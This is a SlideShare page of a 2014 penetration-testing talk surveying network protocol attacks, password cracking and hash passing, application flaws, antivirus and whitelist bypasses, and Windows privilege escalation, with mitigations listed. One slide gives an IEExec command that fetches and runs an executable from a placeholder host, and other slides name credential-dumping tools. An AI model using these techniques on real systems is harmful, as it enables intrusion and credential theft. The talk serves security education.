SlideShare a Scribd company logo

Attack All the Layers: What's Working during Pentests (OWASP NYC)

Scott Sutherland
Scott Sutherland

This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. Vulnerabilities related to the application, network, and server layers will be covered along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real world attacks. This is the version modified for the OWASP meeting in June of 2014.

1 of 58
Download to read offline
Attack All the Layers: What’s Working During Pen Tests Scott Sutherland and Karl Fosaaen
Introductions • Scott Sutherland ‒ Principal Security Consultant @ NetSPI ‒ Twitter: @_nullbind • Karl Fosaaen ‒ Senior Security Consultant @ NetSPI ‒ Twitter: @kfosaaen We specialize in both things and stuff!
Overview • Why do Companies Pen Test? • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation • Conclusions
Why do companies pen test? • Compliance requirements • Evaluate risks associated with an acquisition or partnership • Validate preventative controls • Validate detective controls • Prioritize internal security initiatives • Proactively prevent breaches
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Attacking protocols • ARP: Address Resolution Protocol • NBNS: NetBIOS Name Service • SMB: Server Message Block • PXE: Preboot Execution Environment • DTP: Dynamic Trunking Protocol
Attacking protocols: ARP Address Resolution Protocol
Attacking protocols: ARP • General ‒MAC to IP association ‒Layer 2 • Conditions ‒Independent of user action ‒Broadcast network • Attacks ‒MITM Monitoring ‒MITM Injection ‒DOS
Attacking protocols: ARP
Attacking protocols: ARP • Common mitigating controls: ‒ Dynamic ARP Inspection ‒ Port Security ‒ Static Routes (not recommended)
Attacking protocols: NBNS / LLMNR NetBIOS Name Service
Attacking protocols: NBNS • General ‒ IP to hostname association ‒ Layer 5 / 7 • Constraints ‒ Dependent on user action ‒ Broadcast Network ‒ Windows Only • Attacks ‒ MITM Monitoring ‒ MITM Injection ‒ DOS
Attacking protocols: NBNS
Attacking protocols: NBNS
Attacking protocols: NBNS
Attacking protocols: NBNS • Common mitigating controls: ‒ Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS ‒ Disable NBNS (recommended) • Might cause issues with legacy apps ‒ Disable insecure authentication to help • limit impact of exposed hashes ‒ Enable packet signing to help prevent • SMB Relay attacks
Attacking protocols: SMB Server Message Block
Attacking protocols: SMB • General ‒ SMB is the come back kid! ‒ Layer 7 • Constraints ‒ Dependent on user action ‒ Any routable network ‒ No connecting back to originating host • Attacks ‒ Command execution ‒ Shells..aaand shells
Attacking protocols: SMB
Attacking protocols: SMB • Historically, SMB Relay has been used to: ‒ Execute arbitrary commands ‒ Obtain shells • Lately the community has been developing tools for doing things like: ‒ LDAP queries ‒ SQL queries ‒ Exchange services ‒ Mounting file systems
Attacking protocols: SMB • Common mitigating controls: ‒ Enable packet signing to help prevent SMB Relay attacks ‒ Apply really old patches like if you missed out on the last decade…
Attacking protocols: PXE Preboot eXecution Environment
Attacking protocols: PXE • General ‒ DHCP • Constraints ‒ Broadcast domain • Attacks ‒ Command execution ‒ Access to file system/images
Attacking protocols: PXE • Common mitigating controls: ‒ Isolate networks ‒ Add device validation
Attacking protocols: DTP Dynamic Trunking Protocol
Attacking protocols: DTP • General ‒ 802.1Q encapsulation is in use ‒ Layer 2 • Constraints ‒ Independent of user action ‒ Trunking is set to enabled • or auto on switch port • Attacks ‒ Monitor network traffic for all VLANs, because all VLANs are • allowed on a trunk by default • *Full VLAN hopping
Attacking protocols: DTP
Attacking protocols: DTP
Attacking protocols: DTP
Attacking protocols: DTP
Attacking protocols: DTP • Common mitigating controls: ‒ Use dedicated VLAN ID for all trunking ports ‒ Disable all unused ports and place them on a non-routable VLAN ‒ Configure all user ports as access ports to prevent trunk negotiation ‒ Configure frames with two 802.1Q headers ‒ Configure strong VACLs
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Attacking passwords • Hashes and Cracking (Offline) • Dictionary Attacks (Online) • Dump in Cleartext!
Attacking Passwords Tool Function Year Pass the Hash Passing Hashes 1997 Rainbow Tables Password Cracking 2000s SMB Relay Relaying Captured Hashes 2001 John the Ripper Password Cracking 2001 NetNTLM.pl Cracking Network Hashes 2007 PTH Toolkit Pass all the Hashes 2008 Hashcat CPU and GPU Cracking 2010 WCE and Mimikatz Cleartext Windows Creds 2012
Attacking Passwords: Hashes • What are hashes? ‒ A non-reversible way of storing passwords ‒ Operating systems and applications ‒ Lots of types • LM/NTLM • Network and Local • MD5 • SHA • descrypt
Attacking Passwords: Hashes • How do we get hashes? ‒ Cain and Abel ‒ fgdump ‒ Metasploit ‒ Mimikatz ‒ Databases ‒ Config files
Attacking Passwords: Cracking • Cracking Hashes ‒ Rainbow Tables ‒ John the Ripper ‒ oclHashcat ‒ CPU versus GPU
Attacking Passwords: Cracking 0 100 200 300 400 500 600 Minutes for Six Character Brute Force CPU GPU
Attacking Passwords: CrackingGPUCPU
Attacking Passwords: Passing Hashes • Passing Hashes ‒ Metasploit ‒ psexec ‒ winexec ‒ PTH toolkit
Attacking Passwords: Dictionary • Online Vs. Offline Attacks • Dictionary Attacks ‒ Enumerate users • Null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc. ‒ Attack! • Are users getting smarter? ‒ Sort of… • “Summer2014” meets password • complexity requirements
Attacking Passwords: Cleartext • Common application configs • Reversible Formats ‒ Find in files ‒ Groups.xml ‒ Unattend.xml ‒ Registry • WCE • Mimikatz
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Attacking Applications: Common • Default and weak passwords • SQL injection • RFI/web shells • Web directory traversals • UNC path injection + SMB relay • Critical missing patches
Attacking Applications: Breakouts • Obtain a common dialog box • Bypass folder path and file type restrictions • Bypass file execution restrictions • Bypass file black/white lists • Access to native consoles and management tools • Downloading and use third party applications
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Bypassing EPP: Anti-virus • PowerShell code Injection • Execute off network share • Clone resource tables • Modify import tables • Pack files
Bypassing EPP: App White List • Execution via approved apps ‒ Powershell Code Injection ‒ Rundll32 mydll,DLLMain@12 ‒ IEExec http://x.x.x.x:8080/bypass.exe • Exceptions ‒ File name ‒ Publisher ‒ Directory • Excessive privileges ‒ Services and policy
Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
Windows Escalation: Overview • Privilege Escalation Goals • Local Privilege Escalation • Domain Privilege Escalation
Windows Escalation: Goals • Local Escalation Goals ‒ Find clear text or reversible credentials with local administrative privileges ‒ Get application to run commands as Administrator or LocalSystem • Domain Escalation Goals ‒ Find Domain Admins ‒ Impersonate Domain Admins
Windows Escalation: Local • Local Escalation ‒ *Clear text credentials in files, registry, over network ‒ Insecure service paths ‒ DLL preloading ‒ DLL and exe replacement ‒ Binary planting in auto-run locations (reg and file system) ‒ Modifying schedule tasks ‒ *Local and remote exploits ‒ Leverage local application like IIS, SQL Server etc ‒ *UNC path injection + SMB Relay / Capture + crack
Windows Escalation: Domain • Domain Escalation – Find DAs ‒ Check locally! (Processes, Tokens, Cachedump) ‒ Review active sessions – netsess (veil) ‒ Review remote processes - tasklist ‒ Service Principal Names (SPN) – get-spn ‒ Scanning Remote Systems for NetBIOS Information - nbtscan ‒ Pass the hash to other systems ‒ PowerShell shell spraying ‒ WINRM/WINRS shell spraying ‒ Psexec shell spraying
Windows Escalation: Domain • Domain Escalation – Impersonate DAs ‒ Dump passwords from memory with Mimikatz ‒ Migrate into the Domain Admin’s process ‒ Steal Domain Admins delegation tokens with Incognito ‒ Dump cached domain admin hashes with cachedump ‒ Relatively new techniques • PTH using Kerberos ticket
Conclusions • Most Networks ‒ Kind of broken • Most Protocols ‒ Kind of broken • Most Applications ‒ Kind of broken All can kind of be fixed
Attack all the layers! • Any questions?
Attack all the layers! • Scott Sutherland ‒ Principal Security Consultant ‒ Twitter: @_nullbind • Karl Fosaaen ‒ Senior Security Consultant ‒ Twitter: @kfosaaen

Recommended

Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from Windows
Scott Sutherland
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
Scott Sutherland
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
Scott Sutherland
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksNetSPI
 
Attack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingAttack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingNetSPI
 
Fuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox TestingFuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox Testing
NetSPI
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 

Recommended

Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from Windows
Scott Sutherland
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
Scott Sutherland
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
Scott Sutherland
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksNetSPI
 
Attack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingAttack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingNetSPI
 
Fuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox TestingFuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox Testing
NetSPI
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
CableTap - Wirelessly Tapping Your Home Network
CableTap - Wirelessly Tapping Your Home NetworkCableTap - Wirelessly Tapping Your Home Network
CableTap - Wirelessly Tapping Your Home Network
Christopher Grayson
 
You, and Me, and Docker Makes Three
You, and Me, and Docker Makes ThreeYou, and Me, and Docker Makes Three
You, and Me, and Docker Makes Three
Christopher Grayson
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active Directory
Nikhil Mittal
 
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprints
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprintsAndy Davis' Black Hat USA Presentation Revealing embedded fingerprints
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprintsNCC Group
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
Stephan Borosh
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory Dominance
Nikhil Mittal
 
CNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceCNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise Service
Sam Bowne
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
Beau Bullock
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Prowler: BlackHat Europe Arsenal 2018
Prowler: BlackHat Europe Arsenal 2018Prowler: BlackHat Europe Arsenal 2018
Prowler: BlackHat Europe Arsenal 2018
Toni de la Fuente
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Cloudstone - Sharpening Your Weapons Through Big Data
Cloudstone - Sharpening Your Weapons Through Big DataCloudstone - Sharpening Your Weapons Through Big Data
Cloudstone - Sharpening Your Weapons Through Big Data
Christopher Grayson
 
An Introduction to PowerShell for Security Assessments
An Introduction to PowerShell for Security AssessmentsAn Introduction to PowerShell for Security Assessments
An Introduction to PowerShell for Security AssessmentsEnclaveSecurity
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking Authentication
Sam Bowne
 
Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.
Shahriman .
 
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain AccessDefcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
eightbit
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Priyanka Aash
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Xavier Ashe
 
Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018
Fernando Tomlinson, CISSP, MBA
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360
Scott Sutherland
 
CNIT 123: 8: Desktop and Server OS Vulnerabilites
CNIT 123: 8: Desktop and Server OS VulnerabilitesCNIT 123: 8: Desktop and Server OS Vulnerabilites
CNIT 123: 8: Desktop and Server OS Vulnerabilites
Sam Bowne
 

More Related Content

What's hot

CableTap - Wirelessly Tapping Your Home Network
CableTap - Wirelessly Tapping Your Home NetworkCableTap - Wirelessly Tapping Your Home Network
CableTap - Wirelessly Tapping Your Home Network
Christopher Grayson
 
You, and Me, and Docker Makes Three
You, and Me, and Docker Makes ThreeYou, and Me, and Docker Makes Three
You, and Me, and Docker Makes Three
Christopher Grayson
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active Directory
Nikhil Mittal
 
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprints
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprintsAndy Davis' Black Hat USA Presentation Revealing embedded fingerprints
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprintsNCC Group
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
Stephan Borosh
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory Dominance
Nikhil Mittal
 
CNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceCNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise Service
Sam Bowne
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
Beau Bullock
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Prowler: BlackHat Europe Arsenal 2018
Prowler: BlackHat Europe Arsenal 2018Prowler: BlackHat Europe Arsenal 2018
Prowler: BlackHat Europe Arsenal 2018
Toni de la Fuente
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Cloudstone - Sharpening Your Weapons Through Big Data
Cloudstone - Sharpening Your Weapons Through Big DataCloudstone - Sharpening Your Weapons Through Big Data
Cloudstone - Sharpening Your Weapons Through Big Data
Christopher Grayson
 
An Introduction to PowerShell for Security Assessments
An Introduction to PowerShell for Security AssessmentsAn Introduction to PowerShell for Security Assessments
An Introduction to PowerShell for Security AssessmentsEnclaveSecurity
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking Authentication
Sam Bowne
 
Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.
Shahriman .
 
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain AccessDefcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
eightbit
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Priyanka Aash
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Xavier Ashe
 
Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018
Fernando Tomlinson, CISSP, MBA
 

What's hot (20)

CableTap - Wirelessly Tapping Your Home Network
CableTap - Wirelessly Tapping Your Home NetworkCableTap - Wirelessly Tapping Your Home Network
CableTap - Wirelessly Tapping Your Home Network
 
You, and Me, and Docker Makes Three
You, and Me, and Docker Makes ThreeYou, and Me, and Docker Makes Three
You, and Me, and Docker Makes Three
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active Directory
 
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprints
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprintsAndy Davis' Black Hat USA Presentation Revealing embedded fingerprints
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprints
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory Dominance
 
CNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceCNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise Service
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
Prowler: BlackHat Europe Arsenal 2018
Prowler: BlackHat Europe Arsenal 2018Prowler: BlackHat Europe Arsenal 2018
Prowler: BlackHat Europe Arsenal 2018
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
 
Cloudstone - Sharpening Your Weapons Through Big Data
Cloudstone - Sharpening Your Weapons Through Big DataCloudstone - Sharpening Your Weapons Through Big Data
Cloudstone - Sharpening Your Weapons Through Big Data
 
An Introduction to PowerShell for Security Assessments
An Introduction to PowerShell for Security AssessmentsAn Introduction to PowerShell for Security Assessments
An Introduction to PowerShell for Security Assessments
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking Authentication
 
Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.
 
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain AccessDefcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
 
Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018
 

Similar to Attack All the Layers: What's Working during Pentests (OWASP NYC)

Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360
Scott Sutherland
 
CNIT 123: 8: Desktop and Server OS Vulnerabilites
CNIT 123: 8: Desktop and Server OS VulnerabilitesCNIT 123: 8: Desktop and Server OS Vulnerabilites
CNIT 123: 8: Desktop and Server OS Vulnerabilites
Sam Bowne
 
Ch 8: Desktop and Server OS Vulnerabilites
Ch 8: Desktop and Server OS VulnerabilitesCh 8: Desktop and Server OS Vulnerabilites
Ch 8: Desktop and Server OS Vulnerabilites
Sam Bowne
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseNetSPI
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
The Security of Things Forum
 
CNIT 123 Ch 8: OS Vulnerabilities
CNIT 123 Ch 8: OS VulnerabilitiesCNIT 123 Ch 8: OS Vulnerabilities
CNIT 123 Ch 8: OS Vulnerabilities
Sam Bowne
 
CNIT 123 8: Desktop and Server OS Vulnerabilities
CNIT 123 8: Desktop and Server OS VulnerabilitiesCNIT 123 8: Desktop and Server OS Vulnerabilities
CNIT 123 8: Desktop and Server OS Vulnerabilities
Sam Bowne
 
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths
hibaehed
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
Priyanka Aash
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
dc612
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
Scott Sutherland
 
QA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QAQA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QA
CodeFest
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
Database Firewall with Snort
Database Firewall with SnortDatabase Firewall with Snort
Database Firewall with Snort
Narudom Roongsiriwong, CISSP
 
Codefest2015
Codefest2015Codefest2015
Codefest2015
Denis Kolegov
 
A Byte of Software Deployment
A Byte of Software DeploymentA Byte of Software Deployment
A Byte of Software Deployment
Gong Haibing
 
Application and Server Security
Application and Server SecurityApplication and Server Security
Application and Server Security
Brian Pontarelli
 
Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019
Fernando Tomlinson, CISSP, MBA
 
TTL Alfresco Product Security and Best Practices 2017
TTL Alfresco Product Security and Best Practices 2017TTL Alfresco Product Security and Best Practices 2017
TTL Alfresco Product Security and Best Practices 2017
Toni de la Fuente
 
BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming Workshop
Ajay Choudhary
 

Similar to Attack All the Layers: What's Working during Pentests (OWASP NYC) (20)

Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360
 
CNIT 123: 8: Desktop and Server OS Vulnerabilites
CNIT 123: 8: Desktop and Server OS VulnerabilitesCNIT 123: 8: Desktop and Server OS Vulnerabilites
CNIT 123: 8: Desktop and Server OS Vulnerabilites
 
Ch 8: Desktop and Server OS Vulnerabilites
Ch 8: Desktop and Server OS VulnerabilitesCh 8: Desktop and Server OS Vulnerabilites
Ch 8: Desktop and Server OS Vulnerabilites
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
 
CNIT 123 Ch 8: OS Vulnerabilities
CNIT 123 Ch 8: OS VulnerabilitiesCNIT 123 Ch 8: OS Vulnerabilities
CNIT 123 Ch 8: OS Vulnerabilities
 
CNIT 123 8: Desktop and Server OS Vulnerabilities
CNIT 123 8: Desktop and Server OS VulnerabilitiesCNIT 123 8: Desktop and Server OS Vulnerabilities
CNIT 123 8: Desktop and Server OS Vulnerabilities
 
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
QA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QAQA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QA
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
Database Firewall with Snort
Database Firewall with SnortDatabase Firewall with Snort
Database Firewall with Snort
 
Codefest2015
Codefest2015Codefest2015
Codefest2015
 
A Byte of Software Deployment
A Byte of Software DeploymentA Byte of Software Deployment
A Byte of Software Deployment
 
Application and Server Security
Application and Server SecurityApplication and Server Security
Application and Server Security
 
Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019
 
TTL Alfresco Product Security and Best Practices 2017
TTL Alfresco Product Security and Best Practices 2017TTL Alfresco Product Security and Best Practices 2017
TTL Alfresco Product Security and Best Practices 2017
 
BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming Workshop
 

More from Scott Sutherland

Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Scott Sutherland
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)
Scott Sutherland
 
